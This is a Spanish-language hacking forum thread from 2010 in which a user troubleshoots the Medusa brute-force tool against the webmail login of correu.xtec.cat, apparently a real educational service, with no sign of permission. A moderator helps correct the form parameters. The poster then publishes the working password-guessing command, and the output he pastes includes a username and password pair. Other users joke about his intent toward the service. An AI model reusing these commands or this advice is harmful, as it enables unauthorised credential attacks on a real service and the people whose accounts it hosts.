elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  MEDUSA WEB-FORM
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: MEDUSA WEB-FORM  (Leído 5,782 veces)
kimpa2007

Desconectado Desconectado

Mensajes: 6


Ver Perfil
MEDUSA WEB-FORM
« en: 28 Abril 2010, 23:25 »

Buenasss

mirad estoy haciendo pruebas con el medusa pero tengo un problema.
segun tengo entendido el problema esta en form-data pero no acabo de entender como funciona..

La orden que uso es la siguiente:

medusa -u usuario -P /rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"post?user=&pass" -m DENY-SIGNAL:"incorrect" -h correu.xtec.cat

Si alguien puede ayudarme ;P
En línea

toxeek
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.636


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #1 en: 29 Abril 2010, 15:14 »


Que tal.

Podrias poner que error te suelta?? Siempre dad la maxima info posible (errores...etc.) cuando pidais ayuda para un error como este.

Que version de Medusa usas ?


SaluDoS.
En línea

"La envidia es una declaración de inferioridad"
Napoleón.
kimpa2007

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #2 en: 29 Abril 2010, 17:04 »

pos mira cuando ejecuto la orden solo hace la primera palabra de la wordlist:

GENERAL: Module parameter: FORM:iwc_static/layout/login.html
GENERAL: Module parameter: FORM-DATA:post?user=&pass
GENERAL: Module parameter: DENY-SIGNAL:incorrect
GENERAL: Parallel Hosts: 1 Parallel Logins: 1
GENERAL: Total Hosts: 1
GENERAL: Total Users: 1
GENERAL: Total Passwords: 10000

ACCOUNT CHECK: [web-form] Host: correu.xtec.cat (1 of 1, 0 complete) User: rstein2 (1 of 1, 0 complete) Password: rs0001 (1 of 10000 complete)
ACCOUNT FOUND: [web-form] Host: correu.xtec.cat User: rstein2 Password: rs0001 [SUCCESS]

INFO: Login Module: 0 - Current user password list is complete, selecting next user.
INFO: Login Module: 0 - Current user password list is complete, rescanning userlist for unfinished credentials.
INFO: Login Module: 0 - Current user password list is complete, selecting next user.
INFO: Login Module: 0 - No more user accounts available for testing.
INFO: Login Module: 0 - No more users/passwords available in the normal queue.
INFO: Login Module: 0 - No additional missed users/passwords, setting credential status to CREDENTIAL_DONE.
GENERAL: Medusa has finished.
En línea

kimpa2007

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #3 en: 29 Abril 2010, 17:05 »

aa y la versión que uso es la v2.0
En línea

toxeek
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.636


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #4 en: 29 Abril 2010, 18:52 »


Que tal.


Citar
medusa -u usuario -P /rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"post?user=&pass" -m DENY-SIGNAL:"incorrect" -h correu.xtec.cat

Primero, prueba a poner un "=" (sin comillas) tras pass. O sea, que quede &pass=

Ademas, mira en el source del (x)HTML como el form esta elaborado. Si hay algun value para inputs tipo hidden a*adelos, y si Submit tiene un value (por ejemplo submit) pondlo en la cadena para -m FORM tambien.


Bueno prueba y ve diciendo  ;)


Saludos.

En línea

"La envidia es una declaración de inferioridad"
Napoleón.
toxeek
The "Tricky" ..
Moderador
***
Desconectado Desconectado

Mensajes: 1.636


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #5 en: 29 Abril 2010, 19:18 »


Citar
iwc_static/layout/login.html
??

No sera un .php ???
Mira a ver hacia donde apunta el METHOD del form .. y asegurate que va sobre POST!


Saludos.
En línea

"La envidia es una declaración de inferioridad"
Napoleón.
kimpa2007

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #6 en: 30 Abril 2010, 19:27 »

Ei ya he encontrado mi problema!!
Usando el HTTP live headers he podido ver que me habia equivocado en el form-data.
La orden que tengo que usar es esa:

medusa -u user -P /diccionaris/rs.txt -M web-form -m FORM:"iwc_static/layout/login.html" -m FORM-DATA:"fromlogin=true&username=&pass=" -m DENY-SIGNAL:"El" -h correu.xtec.cat -F

gracias por la ayuda ;P
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: MEDUSA WEB-FORM
« Respuesta #7 en: 30 Abril 2010, 23:40 »

Hay.... que li vols fer a l´xtec?

Salutacions...
En línea

dazoverride

Desconectado Desconectado

Mensajes: 79



Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #8 en: 1 Mayo 2010, 19:43 »

XD xtec? jajajajaja

això em sona :P no seas malooo !!
En línea

Si reproduces un CD de Microsoft al revés puedes escuchar un mensaje satánico...
Eso no es lo peor... Al derecho te instala windows...
kimpa2007

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: MEDUSA WEB-FORM
« Respuesta #9 en: 2 Mayo 2010, 18:51 »

jajaja yo acer algo malo a la xtec?
nunca de la vida ;)
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Cual seria el nombre de host para un web-form con medusa?
Hacking Básico
KalmeniduS 0 1,753 Último mensaje 15 Febrero 2011, 07:30
por KalmeniduS
Medusa web form
Hacking Básico
gettingold 0 1,823 Último mensaje 21 Octubre 2011, 12:55
por gettingold
Falso positivo con Medusa metodo web-form
Hacking Básico
transfersote 1 1,596 Último mensaje 23 Mayo 2013, 10:11
por transfersote
Diccionario con Medusa
Hacking Ético
gooyah 1 1,561 Último mensaje 8 Agosto 2015, 21:09
por el-brujo
Medusa, ophcrack etc no funcionan?
Hacking Básico
fernando143 0 635 Último mensaje 22 Marzo 2017, 16:59
por fernando143
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines